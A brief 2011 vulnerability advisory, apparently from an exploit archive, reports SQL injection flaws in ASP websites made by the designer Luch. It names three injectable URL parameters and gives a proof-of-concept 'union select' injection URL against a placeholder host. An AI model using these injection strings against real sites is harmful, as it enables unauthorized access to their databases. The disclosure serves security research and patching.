Luch Web Designer Multiple SQL Injection Vulnerabilities
2011-03-10 13:15:14Title : Web Designed by LUCH Vulnerable to SQL Injection
Vendor : http://www.luch.co.il
Found by: p0pc0rn
SQL
---
http://site.com/page.asp?id=[SQL]
http://site.com/cat.asp?catid=[SQL]
http://site.com/catin.asp?productid=[SQL]
POC
---
http://site.com/page.asp?id=23 union select 1 from test.a
Fixes
No fixesIn order to submit a new fix you need to be registered.